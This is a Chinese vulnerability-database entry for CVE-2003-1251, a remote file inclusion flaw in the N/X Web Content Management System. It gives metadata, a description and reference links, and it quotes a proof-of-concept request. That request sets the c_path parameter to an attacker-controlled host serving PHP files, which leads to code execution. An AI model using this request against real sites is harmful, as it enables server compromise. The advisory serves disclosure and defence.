N/X Web内容管理系统远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107143 漏洞类型 输入验证
发布时间 2003-01-02 更新时间 2006-01-17
CVE编号 CVE-2003-1251 CNNVD-ID CNNVD-200312-085
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/22116
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-085
|漏洞详情
N/XWebContentManagementSystem是一款方便建立和维护站点的系统。N/XWebCMS多个脚本对用户提交的参数数据缺少正确过滤,远程攻击者可以利用这个漏洞提恶意WEB请求而以WEB权限在系统上执行任意命令。CMS包含的'nx/common/cds/menu.inc.php'和'nx/common/dbo/datasets.php'脚本对用户提交的'c_path'参数缺少正确检查,攻击者可以在自己控制的服务器上提供恶意文件,并提交指向恶意文件的路径作为'c_path'参数的请求,可导致以WEB进程权限在系统上执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/6500/info
 
N/X Web Content Management System is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers.
 
An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for some parameters.
 
If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker. 

http://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/
with :
http://[attacker]/common/dbo/saveset.php
http://[attacker]/common/dbo/recordset.php
http://[attacker]/common/dbo/deleteset.php
http://[attacker]/common/dbo/updateset.php
http://[attacker]/common/dbo/insertset.php
|参考资料

来源:BUGTRAQ
名称:20030102N/X(PHP)
链接:http://archives.neohapsis.com/archives/bugtraq/2003-01/0005.html
来源:BID
名称:6500
链接:http://www.securityfocus.com/bid/6500
来源:XF
名称:nx-file-include(10969)
链接:http://www.iss.net/security_center/static/10969.php
来源:SECUNIA
名称:7808
链接:http://secunia.com/advisories/7808
来源:NSFOCUS
名称:4136
链接:http://www.nsfocus.net/vulndb/4136